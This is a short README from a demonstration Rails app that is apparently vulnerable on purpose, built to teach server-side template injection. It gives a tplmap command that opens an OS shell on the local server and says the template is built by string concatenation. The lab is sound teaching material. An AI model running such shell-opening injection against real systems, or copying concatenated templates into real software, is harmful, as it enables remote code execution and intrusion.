# Hands-on SSTI attack on Rails app

This application is a demonstration prototype just to show how to perform SSTI (Server side templating injection) attack.

Run server

rails server

Run SSTI attack with tplmap:

./tplmap.py --data 'name=value1' --engine erb --os-shell -u 'http://localhost:3000'

In this example, the template is built by concatenation 😱

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
app		app
bin		bin
config		config
db		db
lib		lib
log		log
public		public
storage		storage
test		test
tmp		tmp
vendor		vendor
.gitattributes		.gitattributes
.gitignore		.gitignore
.ruby-version		.ruby-version
Gemfile		Gemfile
Gemfile.lock		Gemfile.lock
LICENSE		LICENSE
README.md		README.md
Rakefile		Rakefile
config.ru		config.ru